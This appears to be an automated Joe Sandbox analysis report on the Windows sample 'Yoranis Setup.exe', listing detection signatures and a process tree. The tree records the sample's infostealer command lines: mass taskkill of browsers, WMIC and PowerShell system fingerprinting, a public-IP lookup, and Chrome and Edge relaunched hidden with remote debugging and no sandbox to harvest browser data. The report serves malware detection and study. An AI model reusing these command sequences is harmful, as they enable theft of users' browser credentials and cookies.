Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Yoranis Setup.exe

Overview

General Information

Sample name:Yoranis Setup.exe
Analysis ID:1584251
MD5:b3cbd672cb20b2112488d26a6b325e69
SHA1:c752f280a123a30177ba1e17d770bead2c0644a9
SHA256:9bdec941d05ba0c0f365e2198600914d6001745cf554b8e6673d5045b7f6205d
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Drops large PE files
Excessive usage of taskkill to terminate processes
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64native
  • Yoranis Setup.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\Yoranis Setup.exe" MD5: B3CBD672CB20B2112488D26A6B325E69)
    • cmd.exe (PID: 8056 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq YoransSetup.exe" /FO csv | "C:\Windows\system32\find.exe" "YoransSetup.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3656 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • find.exe (PID: 1796 cmdline: "C:\Windows\system32\find.exe" "YoransSetup.exe" MD5: 31D06677CD9ACA84EA2E2E8E3BF22D65)
  • YoransSetup.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" MD5: 19A61DB800E68F1BCB442D9B2531E6BC)
    • cmd.exe (PID: 3392 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 6588 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • YoransSetup.exe (PID: 4672 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 19A61DB800E68F1BCB442D9B2531E6BC)
    • cmd.exe (PID: 4592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • curl.exe (PID: 4840 cmdline: curl http://api.ipify.org/ --ssl-no-revoke MD5: 1C3645EBDDBE2DA6A32A5F9FB43A3C23)
    • cmd.exe (PID: 1504 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WMIC.exe (PID: 3664 cmdline: wmic bios get smbiosbiosversion MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 900 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WMIC.exe (PID: 3960 cmdline: wmic MemoryChip get /format:list MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
      • find.exe (PID: 6000 cmdline: find /i "Speed" MD5: AE3F3DC3ED900F2A582BAD86A764508C)
    • YoransSetup.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 19A61DB800E68F1BCB442D9B2531E6BC)
    • cmd.exe (PID: 564 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WMIC.exe (PID: 1648 cmdline: wmic path win32_VideoController get name MD5: A2EF3F0AD95FDA9262A5F9533B6DD1BD)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5652 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 5672 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6704 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7332 cmdline: taskkill /IM msedge.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4424 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4916 cmdline: taskkill /IM brave.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 1608 cmdline: taskkill /IM firefox.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3348 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 5440 cmdline: taskkill /IM opera.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2556 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4632 cmdline: taskkill /IM kometa.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7456 cmdline: taskkill /IM orbitum.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7564 cmdline: taskkill /IM centbrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7328 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4840 cmdline: taskkill /IM 7star.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5480 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4912 cmdline: taskkill /IM sputnik.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5368 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 816 cmdline: taskkill /IM vivaldi.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 572 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4132 cmdline: taskkill /IM epicprivacybrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6880 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 6532 cmdline: taskkill /IM uran.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6000 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 2476 cmdline: taskkill /IM yandex.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1820 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 5072 cmdline: taskkill /IM iridium.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3692 cmdline: tasklist /FI "IMAGENAME eq msedge.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3644 cmdline: tasklist /FI "IMAGENAME eq firefox.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 5816 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 2504 cmdline: tasklist /FI "IMAGENAME eq chrome.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 4432 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 7748 cmdline: tasklist /FI "IMAGENAME eq iexplore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 1652 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 552 cmdline: tasklist /FI "IMAGENAME eq iexplore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6604 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 5540 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 8172 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 1920 cmdline: taskkill /IM msedge.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 2556 cmdline: taskkill /IM brave.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1260 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 8060 cmdline: taskkill /IM firefox.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4320 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7328 cmdline: taskkill /IM opera.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4608 cmdline: taskkill /IM kometa.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3412 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 7444 cmdline: taskkill /IM orbitum.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 284 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 1476 cmdline: taskkill /IM centbrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4472 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 2040 cmdline: taskkill /IM 7star.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3544 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 6060 cmdline: taskkill /IM sputnik.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4400 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 4728 cmdline: taskkill /IM vivaldi.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1740 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 6204 cmdline: taskkill /IM epicprivacybrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 572 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 3528 cmdline: taskkill /IM uran.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 5992 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 8012 cmdline: taskkill /IM yandex.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2708 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 1744 cmdline: taskkill /IM iridium.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • chrome.exe (PID: 8092 cmdline: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000 MD5: BB7C48CDDDE076E7EB44022520F40F77)
    • cmd.exe (PID: 1472 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 4104 cmdline: tasklist /FI "IMAGENAME eq msedge.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 6876 cmdline: tasklist /FI "IMAGENAME eq firefox.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 3260 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 4652 cmdline: tasklist /FI "IMAGENAME eq iexplore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 3128 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 5616 cmdline: tasklist /FI "IMAGENAME eq iexplore.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 2096 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 2728 cmdline: tasklist /FI "IMAGENAME eq chrome.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskkill.exe (PID: 6004 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • msedge.exe (PID: 4644 cmdline: "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
      • msedge.exe (PID: 4960 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3448241921201964185,6892278070021911797,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2412 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)
    • cmd.exe (PID: 2940 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 3180 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 2040 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 7672 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
